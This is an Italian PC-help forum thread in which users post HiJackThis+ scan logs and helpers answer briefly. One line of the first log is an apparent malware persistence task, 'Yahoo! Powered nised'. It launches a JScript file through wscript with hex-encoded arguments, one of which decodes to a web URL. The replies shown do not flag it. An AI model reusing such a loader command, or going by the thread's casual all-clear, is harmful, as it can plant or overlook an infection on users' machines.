O22 - Tasks_Migrated: (disabled) Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Tasks_Migrated: (disabled) ASUS Live Update - C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe
O22 - Tasks_Migrated: (disabled) ASUS P4G - C:\Program Files\ASUS\P4G\BatteryLife.exe
O22 - Tasks_Migrated: (disabled) ASUS Quick Gesture - C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x86\QuickGesture.exe
O22 - Tasks_Migrated: (disabled) ASUS Quick Gesture (x64) - C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x64\QuickGesture64.exe
O22 - Tasks_Migrated: (disabled) ASUS Smart Gesture Launcher - C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe
O22 - Tasks_Migrated: (disabled) ASUS SmartLogon Console Sensor - C:\Program Files (x86)\ASUS\FaceLogon\sensorsrv.exe
O22 - Tasks_Migrated: (disabled) ASUS USB Charger Plus - C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
O22 - Tasks_Migrated: (disabled) GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Tasks_Migrated: (disabled) ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe --domain-id 4e00205a-2ab1-4423-8f77-cc25b82cde1d --caller winlogon-impersonate
O22 - Tasks_Migrated: \AVAST Software\Overseer - C:\Program Files\Common Files\avast software\overseer\overseer.exe /from_scheduler:1
O22 - Tasks_Migrated: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file)
O22 - Tasks_Migrated: \Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner - C:\WINDOWS\system32\mitigationscanner.exe (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ActivateWindowsSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoActivateWindowsSearch (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ConfigureInternetTimeService - C:\WINDOWS\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\DispatchRecoveryTasks - C:\WINDOWS\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ehDRMInit - C:\WINDOWS\ehome\ehPrivJob.exe /DRMInit (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\InstallPlayReady - C:\WINDOWS\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\mcupdate - C:\WINDOWS\ehome\mcupdate $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\mcupdate_scheduled - C:\WINDOWS\ehome\mcupdate -crl -hms -pscn 15 (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\MediaCenterRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -MediaCenterRecoveryTask (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -ObjectStoreRecoveryTask (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\OCURActivate - C:\WINDOWS\ehome\ehPrivJob.exe /OCURActivate (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\OCURDiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PBDADiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /PBDADiscovery (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PBDADiscoveryW1 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PBDADiscoveryW2 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PvrRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -PvrRecoveryTask (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\PvrScheduleTask - C:\WINDOWS\ehome\mcupdate.exe -PvrSchedule (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\RegisterSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\ReindexSearchRoot - C:\WINDOWS\ehome\ehPrivJob.exe /DoReindexSearchRoot (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\SqlLiteRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -SqlLiteRecoveryTask (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Media Center\UpdateRecordPath - C:\WINDOWS\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\MobilePC\HotStart - {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - (no file)
O22 - Tasks_Migrated: \Microsoft\Windows\RemovalTools\MRT_ERROR_HB - C:\WINDOWS\system32\MRT.exe /EHB /HeartbeatFailure "SubmitHeartbeatReportData" /HeartbeatError "0x80072ee7"
O22 - Tasks_Migrated: \Microsoft\Windows\SideShow\GadgetManager - {FF87090D-4A9A-4F47-879B-29A80C355D61},$(Arg0) - (no file)
O22 - Tasks_Migrated: \Microsoft\Windows\SMB\UninstallSMB1ClientTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Client"
O22 - Tasks_Migrated: \Microsoft\Windows\SMB\UninstallSMB1ServerTask - C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -NoProfile -WindowStyle Hidden "& C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\DisableUnusedSmb1.ps1 -Scenario Server"
O22 - Tasks_Migrated: \Microsoft\Windows\TabletPC\InputPersonalization - C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe (Microsoft)
O22 - Tasks_Migrated: \Microsoft\Windows\Tcpip\IpAddressConflict1 - C:\WINDOWS\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (Microsoft)
O22 - Tasks_Migrated: \Microsoft\Windows\Tcpip\IpAddressConflict2 - C:\WINDOWS\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (Microsoft)
O22 - Tasks_Migrated: {085E5AE1-682E-4941-8059-CC6CEDDE3C29} - C:\WINDOWS\system32\pcalua.exe -a "C:\Users\mf\Downloads\eMule0.50a-Installer (2).exe" -d C:\Users\mf\Downloads
O22 - Tasks_Migrated: {12BD7B1A-6388-4013-8AC1-1883FE47F70D} - c:\program files (x86)\mozilla firefox\firefox.exe http://ui.skype.com/ui/0/6.7.59.102/it/abandoninstall?page=tsProgressBar (file missing)
O22 - Tasks_Migrated: {3C468AAC-74FF-4747-B9D1-910275B1F460} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (1).exe" -d C:\Users\mf\Downloads
O22 - Tasks_Migrated: {595F7578-6091-4104-8C2C-3638A55FCA14} - c:\program files (x86)\mozilla firefox\firefox.exe http://www.skype.com/go/downloading?source=lightinstaller&ver=6.7.0.102&LastError=12002 (file missing)
O22 - Tasks_Migrated: {865AE5AF-4CD1-4557-B379-1514C9E2B671} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (5).exe" -d C:\Users\mf\Downloads
O22 - Tasks_Migrated: {9783570B-C119-497B-9666-089FCACD6DAA} - C:\Windows\system32\pcalua.exe -a C:\Users\mf\Desktop\HiJackThis.exe -d C:\Users\mf\Desktop
O22 - Tasks_Migrated: {B618187F-895E-4717-A6A2-8CBAD7BF869E} - c:\program files (x86)\mozilla firefox\firefox.exe http://ui.skype.com/ui/0/6.6.0.106/it/abandoninstall?source=lightinstaller&page=tsInstall (file missing)
O22 - Tasks_Migrated: {C6509AC9-3829-4877-9816-6D7412C5D865} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (2).exe" -d C:\Users\mf\Downloads
O22 - Tasks_Migrated: {F77EE82F-C7C7-45A3-8AF5-781029F12F97} - c:\program files (x86)\mozilla firefox\firefox.exe http://www.skype.com/go/downloading?source=lightinstaller&ver=6.11.0.102&LastError=12002 (file missing)
O22 - Tasks_Migrated: Adobe Flash Player NPAPI Notifier - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_414_Plugin.exe -check plugin (file missing)
O22 - Tasks_Migrated: Adobe Flash Player PPAPI Notifier - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_414_pepper.exe -check pepperplugin (file missing)
O22 - Tasks_Migrated: Adobe Flash Player Updater - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (file missing)
O22 - Tasks_Migrated: ATKOSD2 - C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
O22 - Tasks_Migrated: Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
O22 - Tasks_Migrated: Avast Secure Browser Heartbeat Task (Hourly) - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --hourly
O22 - Tasks_Migrated: Avast Secure Browser Heartbeat Task (Logon) - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --logon
O22 - Tasks_Migrated: avastBCLRestartS-1-5-21-1232614349-1706152515-3375908610-1001 - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (file missing)
O22 - Tasks_Migrated: AvastUpdateTaskMachineCore - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /c
O22 - Tasks_Migrated: AvastUpdateTaskMachineUA - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /ua /installsource scheduler
O22 - Tasks_Migrated: ByteFence - C:\Program Files\ByteFence\ByteFence.exe /a (file missing)
O22 - Tasks_Migrated: CCleaner Update - C:\Program Files\CCleaner\CCUpdate.exe
O22 - Tasks_Migrated: CCleanerSkipUAC - C:\Program Files\CCleaner\CCleaner.exe $(Arg0)
O22 - Tasks_Migrated: Digital Sites - C:\Users\mf\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE /Check (file missing)
O22 - Tasks_Migrated: GarminUpdaterTask - C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe
O22 - Tasks_Migrated: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Tasks_Migrated: ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe --domain-id 4e00205a-2ab1-4423-8f77-cc25b82cde1d --caller scheduler-impersonate
O22 - Tasks_Migrated: LaunchSignup - C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe frompopup (file missing)
O22 - Tasks_Migrated: SidebarExecute - C:\Program Files\Windows Sidebar\sidebar.exe (file missing)
O22 - Tasks_Migrated: Yahoo! Powered nised - C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{7015B576-FA57-3FB0-7C91-A1F2E6D32A3C}\timo.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b37303135423537362d464135372d334642302d374339312d4131463245364433324133437d5c726f6465646f" "433a5c50726f6772616d446174615c7b37303135423537362d464135372d334642302d374339312d4131463245364433324133437d5c7261726f6c6963" "//B" "//E:jscript" "--IsErIk"
O23 - Service R2: AFBAgent - C:\WINDOWS\system32\FBAgent.exe
O23 - Service R2: Application Virtualization Client - (sftlist) - C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
O23 - Service R2: Avast Antivirus - (avast! Antivirus) - C:\Program Files\AVAST Software\Avast\AvastSvc.exe /runassvc
O23 - Service R2: Avast Tools - (avast! Tools) - C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe /runassvc
O23 - Service R2: AvastWscReporter - C:\Program Files\AVAST Software\Avast\wsc_proxy.exe /runassvc /rpcserver
O23 - Service R2: BingBar Service - (BBSvc) - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BBSvc.exe
O23 - Service R2: CCleaner Performance Optimizer Service - (CCleanerPerformanceOptimizerService) - C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe
O23 - Service R2: Client Virtualization Handler - (cvhsvc) - C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
O23 - Service R3: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R3: ASLDR Service - (ASLDRService) - C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe
O23 - Service R3: ASUS InstantOn Service - (ASUS InstantOn) - C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnSrv.exe
O23 - Service R3: aswbIDSAgent - C:\Program Files\AVAST Software\Avast\aswidsagent.exe
O23 - Service R3: ATKGFNEX Service - (ATKGFNEXSrv) - C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
O23 - Service R3: BBUpdate - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.exe
O23 - Service R3: Cyclone License Server - (CycloneLicenseServer) - C:\Program Files (x86)\Leica Geosystems\Cyclone\CyraLicense.exe "C:\Program Files (x86)\Leica Geosystems\Cyclone\"
O23 - Service R3: Intel(R) Capability Licensing Service Interface - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service R3: Intel(R) Dynamic Application Loader Host Interface Service - (jhi_service) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service R3: Intel(R) HD Graphics Control Panel Service - (igfxCUIService1.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R3: Intel(R) Management and Security Application Local Management Service - (LMS) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service R3: Intel(R) Management and Security Application User Notification Service - (UNS) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service R3: Intel(R) ME Service - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
O23 - Service R3: Leica HDS Server - C:\Program Files (x86)\Leica Geosystems\Cyclone\fastobjectsserver.exe -config "C:\Program Files (x86)\Leica Geosystems\Cyclone\ptserver.cfg"
O23 - Service S2: Garmin Device Interaction Service - C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe EXPRESS
O23 - Service S2: Servizio %1!s! Update (avast) - (avast) - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /svc
O23 - Service S2: Servizio di Google Updater (GoogleUpdaterService134.0.6985.0) - (GoogleUpdaterService134.0.6985.0) - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --system --windows-service --service=update
O23 - Service S2: Servizio interno di Google Updater (GoogleUpdaterInternalService134.0.6985.0) - (GoogleUpdaterInternalService134.0.6985.0) - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --system --windows-service --service=update-internal
O23 - Service S3: Avast Secure Browser Elevation Service (AvastSecureBrowserElevationService) - (AvastSecureBrowserElevationService) - C:\Program Files (x86)\AVAST Software\Browser\Application\131.0.27894.265\elevation_service.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\133.0.6943.98\elevation_service.exe
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: NVIDIA Update Service Daemon - (nvUpdatusService) - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
O23 - Service S3: Servizio %1!s! Update (avastm) - (avastm) - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /medsvc


--
End of file - Time spent: 180,5 sec. - 105326 bytes, CRC32: FFFFFFFF. Sign: ﾝဓ

 

[ERCOLINO]

Che problema riscontri?

E' possibile anche usare l'ultima Versione 3.4.0.17 (beta)

Cancella il contenuto della cartella Temp

C:Windows/temp

​

 

[uno_a_caso]

problemi di lentezza ma le cause potrebbero essere altre....

 

[uno_a_caso]

ho aggiornato e ri-scansionato

mi sono accorto di queste righe aggiuntive
La O27 (bad profile) è un problema?


O26 - Office Addin: HKLM\..\AdobeAcroOutlook.SendAsLink - (Adobe Document Cloud for Microsoft Outlook - Acrobat) -> C:\Program Files\Adobe\Acrobat DC\PDFMaker\Mail\Outlook\x64\SendAsLinkAddin.dll (sign: 'Adobe Inc.')
O26 - Office Addin: HKLM\..\avast.AsOutExt - (Avast Add-in) -> C:\Program Files\AVAST Software\Avast\asOutExt.dll (sign: 'Avast Software s.r.o.')
O26 - Office Addin: HKLM\..\PDFMaker.OfficeAddin - (no name) -> C:\Program Files\Adobe\Acrobat DC\PDFMaker\Office\x64\PDFMOfficeAddin.dll (sign: 'Adobe Inc.')
O26-32 - Office Addin: HKLM\..\AdobeAcroOutlook.SendAsLink - (Adobe Document Cloud for Microsoft Outlook - Acrobat) -> C:\Program Files\Adobe\Acrobat DC\PDFMaker\Mail\Outlook\SendAsLinkAddin.dll (sign: 'Adobe Inc.')
O26-32 - Office Addin: HKLM\..\avast.AsOutExt - (Avast Add-in) -> C:\Program Files\AVAST Software\Avast\x86\asOutExt.dll (sign: 'Avast Software s.r.o.')
O26-32 - Office Addin: HKLM\..\PDFMaker.OfficeAddin - (no name) -> C:\Program Files\Adobe\Acrobat DC\PDFMaker\Office\PDFMOfficeAddin.dll (sign: 'Adobe Inc.')
O26-32 - Office Addin: HKLM\..\Search.OutlookToolbar - (Windows Search Email Indexer) -> (no file)
O27 - Account: (Bad profile) Folder is not referenced by any of user SIDs: C:\Users\Default.migrated

 

[ERCOLINO]

A me sembra ok

 

[scarfacecik84]

un pò di instabilità dopo aver bloccato un download sospetto (prima da chrome poi da windows)
ora il pc va meglio giusto per sicurezza potete controllare se è tutto ok? grazie

Logfile of HiJackThis+ build 2025-01-16 Beta v.3.4.0.17

Platform: x64 Windows 11 (Pro), 10.0.26100.4652 (ReleaseId: 2009, 24H2), Service Pack: 0
Time: 16.07.2025 - 22:54 (UTC+02:00)
Language: OS: Italian (0x410). Display: Italian (0x410). Non-Unicode: Italian (0x410)
Memory: 9,17 GiB Free / 16. Loading RAM (42 %), CPU (2 %)
Disk C: 348,70 GiB Free / 931 (SSD, GPT)
Elevated: Yes
Ran by: Utente (group: Administrators; type: Microsoft) on DESKTOP-ISBNC43, FirstRun: yes

Chrome: 138.0.7204.101
Internet Explorer: 11.0.26100.1882
Default: "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal (Secure Boot: Off)

Running processes:
Number | Path
1 C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
1 C:\Program Files (x86)\Common Files\Steam\steamservice.exe
6 C:\Program Files (x86)\Microsoft\EdgeWebView\Application\138.0.3351.83\msedgewebview2.exe
1 C:\Program Files (x86)\Nero\Nero 2020\Nero BackItUp\NBService.exe
1 C:\Program Files (x86)\Nero\Update\NASvc.exe
7 C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
1 C:\Program Files (x86)\Steam\steam.exe
1 C:\Program Files\AMD\CNext\CNext\amdow.exe
1 C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
1 C:\Program Files\AMD\CNext\CNext\AMDRSSrcExt.exe
1 C:\Program Files\AMD\CNext\CNext\cncmd.exe
1 C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe
1 C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
1 C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
1 C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
5 C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EACefSubProcess.exe
1 C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EADesktop.exe
1 C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALocalHostSvc.exe
8 C:\Program Files\Google\Chrome\Application\chrome.exe
1 C:\Program Files\HPPrintScanDoctor\HPPrintScanDoctorService.exe
1 C:\Program Files\WindowsApps\Microsoft.StartExperiencesApp_1.73.0.0_x64__8wekyb3d8bbwe\MicrosoftStartFeedProvider\MicrosoftStartFeedProvider.exe
1 C:\Program Files\WindowsApps\Microsoft.WidgetsPlatformRuntime_1.6.9.0_x64__8wekyb3d8bbwe\WidgetService\WidgetService.exe
1 C:\Program Files\WindowsApps\Microsoft.YourPhone_1.25061.44.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
1 C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_525.15301.20.0_x64__cw5n1h2txyewy\WidgetBoard.exe
1 C:\Program Files\WindowsApps\MicrosoftWindows.CrossDevice_1.25061.25.0_x64__cw5n1h2txyewy\CrossDeviceService.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25050.5-0\MpDefenderCoreService.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25050.5-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25050.5-0\NisSrv.exe
1 C:\Users\Utente\Downloads\EA FC 25\HiJackThis_test\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\ImmersiveControlPanel\SystemSettings.exe
1 C:\Windows\RtkBtManServ.exe
1 C:\Windows\System32\AggregatorHost.exe
1 C:\Windows\System32\ApplicationFrameHost.exe
1 C:\Windows\System32\backgroundTaskHost.exe
1 C:\Windows\System32\cmd.exe
1 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\DriverStore\FileRepository\amdfendr.inf_amd64_1aafc0a9b0693712\amdfendrsr.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0416936.inf_amd64_750d60fa99d453bd\B416914\atieclxx.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0416936.inf_amd64_750d60fa99d453bd\B416914\atiesrxx.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\GigabyteUpdateService.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\oobe\UserOOBEBroker.exe
2 C:\Windows\System32\RtkAudUService64.exe
5 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchFilterHost.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SearchProtocolHost.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\ShellHost.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spool\drivers\x64\3\E1YATIBHE.EXE
1 C:\Windows\System32\spoolsv.exe
87 C:\Windows\System32\svchost.exe
2 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wbem\WMIADAP.exe
1 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
2 C:\Windows\System32\WUDFHost.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe

O4 - ActiveSetup: HKLM\..\{8A69D345-D564-463c-AFF1-A69D9E530F96}: [StubPath] = C:\Program Files\Google\Chrome\Application\138.0.7204.101\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level --channel=stable (sign: 'Google LLC')
O4 - HKCU\..\Run: [AMDNoiseSuppression] = C:\WINDOWS\system32\AMD\ANR\AMDNoiseSuppression.exe (sign: 'Advanced Micro Devices Inc.')
O4 - HKCU\..\Run: [EADM] = C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe -silent (sign: 'Electronic Arts, Inc.')
O4 - HKCU\..\Run: [EPLTarget\P0000000000000000] = C:\WINDOWS\system32\spool\DRIVERS\x64\3\E1YATIBHE.EXE /EPT "EPLTarget\P0000000000000000" /M "XP-4200 Series" (sign: 'SEIKO EPSON CORPORATION')
O4 - HKCU\..\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent (sign: 'Valve Corp.')
O4 - HKCU\..\StartupApproved\Run: [MicrosoftEdgeAutoLaunch_B171DF7C782C6549CCED649E6C8247F6] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --win-session-start (2023/11/07) (sign: 'Microsoft')
O4 - HKCU\..\StartupApproved\Run: [OneDrive] = C:\Program Files\Microsoft OneDrive\OneDrive.exe /background (2023/11/07) (sign: 'Microsoft')
O4 - HKLM\..\Run: [RtkAudUService] = C:\WINDOWS\System32\RtkAudUService64.exe -background (sign: 'Realtek Semiconductor Corp.')
O4 - HKLM\..\StartupApproved\Run32: [DriveSpan] = C:\Program Files (x86)\Nero\Transfer\Transfer.exe (2023/11/07) (sign: 'Nero AG')
O4 - HKLM\..\StartupApproved\Run32: [Nero BackItUp] = C:\Program Files (x86)\Nero\Nero 2020\Nero BackItUp\BackItUp.exe /WinStart (2023/11/07) (sign: 'Nero AG')
O4 - HKU\S-1-5-18\..\Run: [AMDNoiseSuppression] = C:\WINDOWS\system32\AMD\ANR\AMDNoiseSuppression.exe (User 'LocalSystem') (sign: 'Advanced Micro Devices Inc.')
O4 - HKU\S-1-5-18\..\RunOnce: [StartRSX] = C:\Program Files\AMD\CNext\CNext\LauncherRSXRuntime.exe (User 'LocalSystem') (sign: 'Advanced Micro Devices')
O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-19\..\RunOnce: [OneDrive] = C:\Program Files\Microsoft OneDrive\OneDrive.exe /background /setautostart (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Network service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\RunOnce: [OneDrive] = C:\Program Files\Microsoft OneDrive\OneDrive.exe /background /setautostart (User 'Network service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Network service') (sign: 'Microsoft')
O7 - Policy: (UAC) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System: [ConsentPromptBehaviorAdmin] = 0
O7 - Policy: (UAC) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System: [PromptOnSecureDesktop] = 0
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Se&nd to OneNote: (default) = C:\Program Files\Microsoft Office\root\Office16\ONBttnIE.dll (file missing)
O17 - DHCP DNS 1: 10.158.61.94
O22 - Task (.job): (Not scheduled) EPSON XP-4200 Series Update {DC31FB32-87E3-478F-97A5-B218247F7389}.job - C:\WINDOWS\system32\spool\DRIVERS\x64\3\E1YTSBHE.EXE (sign: 'SEIKO EPSON CORPORATION')
O22 - Tasks: (disabled) \Microsoft\Office\Office Actions Server - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ActionsServer\ActionsServer.exe availabilitycheck (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Office\Office Startup Boost - C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe /prewarm (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Office\Office Startup Boost Logon - C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe /prewarm (sign: 'Microsoft')
